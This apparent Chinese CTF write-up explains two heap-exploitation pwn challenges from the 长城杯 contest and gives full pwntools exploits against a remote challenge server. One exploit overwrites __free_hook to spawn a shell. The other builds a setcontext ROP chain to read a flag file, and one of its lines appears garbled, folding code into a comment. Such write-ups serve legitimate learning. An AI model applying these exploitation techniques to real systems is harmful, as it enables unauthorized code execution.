长城杯 | ABf1ag's blog

长城杯wp

高校组好卷，出来这么多题还是进不了线下，最后是16名。。。题目的话pwn都是常规题，还有一道虚拟机的题日后有时间复现复现

这题漏洞点挺多，第一个在，free后指针没置0

第二个off-by-one漏洞

因为没有输出功能，所以我们直接打stdout泄露出libc_base，再用unsortedbin attack将free_hook上方写入\x7f然后直接打free_hook

~~不知道为啥最近利用malloc__hook、realloc_hook打gadget总是失败exceve的第三个参数总是不为0~~

exp:

from pwn import *
#io=process('./pwn',env={'LD_PRELOAD':'./libc.so.6'})
#io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc.so.6')
#libc=elf.libc
context.log_level='debug'

def add(index,size):
	io.sendlineafter('>> \n','1')
	io.sendlineafter('input index:\n',str(index))
	io.sendlineafter('size:\n',str(size))

def dele(index):	
	io.sendlineafter('>> \n','2')
	io.sendlineafter('input index:\n',str(index))
	
def edit(index,context):
	io.sendlineafter('>> \n','3')
	io.sendlineafter('input index:\n',str(index))
	io.sendafter('context:\n',context)

def gift():
	io.sendlineafter('>> \n','666')
	
def exp():
	add(0,0x88)#0
	add(1,0x68)#1
	add(2,0x78)#2
	add(3,0x68)#3
	add(4,0x18)#4
	edit(1,'a'*0x68+p16(0xf1))
		
	dele(2)
	
	dele(3)
	add(2,0x78)#2
	edit(3,p16(0x85dd)+'\n')
	add(5,0x68)#5 = 3
	
	add(6,0x68)#6 stdout
	edit(6,'a'*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88)+'\n')
	stdin=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	libc_base=stdin-libc.symbols['_IO_2_1_stdin_']
	print('libc_base',hex(libc_base))
	malloc_hook=libc_base+libc.symbols['__malloc_hook']
	gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
	free_hook=libc_base+libc.symbols['__free_hook']
	system=libc_base+libc.symbols['system']
	edit(3,p64(malloc_hook+88+16)+p64(free_hook-0x28)+'\n')	
		
	add(9,0x68)	
	#gdb.attach(io)
	
	
	dele(1)
	
	edit(1,p64(free_hook-0x1b)+'\n')
	
	add(1,0x68)#1
	add(7,0x68)#7
	
	edit(7,'/bin/sh\x00'+'a'*(0xb-8)+p64(system)+'\n')
	

	dele(7)

	io.interactive()

#exp()
i=0
while(i!=20):
	try:
		#io=process('./pwn',env={'LD_PRELOAD':'./libc.so.6'})
		#io=process('./pwn')		
		io=remote('47.104.190.157' ,26840)
		exp()
		i+=1
	except:
		io.close()
		i+=1

开了沙箱

这个题的漏洞点在free后没有置0

且申请的大小也被限制在0x10~0x60之间，我们利用tcache_struct这个大小为0x250的chunk来获得libc_base，接着利用free_hook执行setcontex函数将栈迁到堆上执行我们构造的rop读取flag

exp：

from pwn import *
#io=process('./pwn',env={'LD_PRELOAD':'./libc.so.6'})
io=remote('47.104.190.157' ,25329)
#io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc.so.6')
#libc=elf.libc
context.log_level='debug'

def add(index,size):
	io.sendlineafter('>> \n','1')
	io.sendlineafter('index:',str(index))
	io.sendlineafter('size:\n',str(size))

def dele(index):
	io.sendlineafter('>> \n','2')
	io.sendlineafter('index:',str(index))

def edit(index,context):
	io.sendlineafter('>> \n','3')
	io.sendlineafter('index:',str(index))
	io.sendafter('context:\n',context)

def show(index):
	io.sendlineafter('>> \n','4')
	io.sendlineafter('index:',str(index))
def exp():
	add(0,0x60)#0
	add(1,0x60)#1
	add(2,0x60)#2
	dele(0)
	dele(1)
	show(1)
	heap_base=u64(io.recvuntil('\x55')[-6:].ljust(8,'\x00'))-0x770-0x40
	print('heap_base',hex(heap_base))
	add(1,0x60)#1
	
	
	edit(0,p64(heap_base))
	add(3,0x60)#3
	
	add(0,0x60)#tcache
	edit(0,'\x07'*0x30+'\x00'*(0x60-0x30))
	#gdb.attach(io)	
	dele(0)
	add(4,0x40)
	edit(0,'a'*0x50)
	
	show(0)
	io.recvuntil('a'*0x50)
	malloc_hook=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-16
	libc_base=malloc_hook-libc.symbols['__malloc_hook']
	print('libc_base',hex(libc_base))
	free_hook=libc_base+libc.symbols['__free_hook']
	pop_rdi=0x00000000000215bf+libc_base
	pop_rsi=0x0000000000023eea+libc_base
	pop_rdx=0x0000000000001b96+libc_base
	pop_rax=0x0000000000043ae8+libc_base
	open64=libc_base+libc.symbols['open']
	read=libc_base+libc.symbols['read']
	syscall=read+15
	write=libc_base+libc.symbols['write']
	setcontext=libc_base+libc.symbols['setcontext']+53
	edit(0,'\x00'*2+'\x01'+'\x00'*(0x40-3)+p64(0)*2+p64(free_hook-0x8))
		
	add(5,0x38)#free_hook	
	edit(0,'\x00'*0x40+p64(0)+p64(0x211)+p64(malloc_hook+96+16))
		
	add(6,0x58)#6
	
	add(7,0x58)#7
	edit(0,'./flag\x00')
	edit(1,p64(heap_base+0x880+0x40))
	edit(7,'\x00'*0x40+p64(heap_base+0x880+0x40)+p64(pop_rdi))
	edit(5,p64(heap_base+0xb10+0x40-0xa0)+p64(setcontext))
	#open(./flag,0)	
	shellcode=p64(heap_base)+p64(open64)
	#read(fd,addr,0x30)			        shellcode+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(heap_base)+p64(pop_rdx)+p64(0x30)+p64(read)
	#write(1,addr,0x30)
	shellcode+=p64(pop_rdi)+p64(1)+p64(write)
	edit(2,shellcode)
	dele(6)	
	io.interactive()
exp()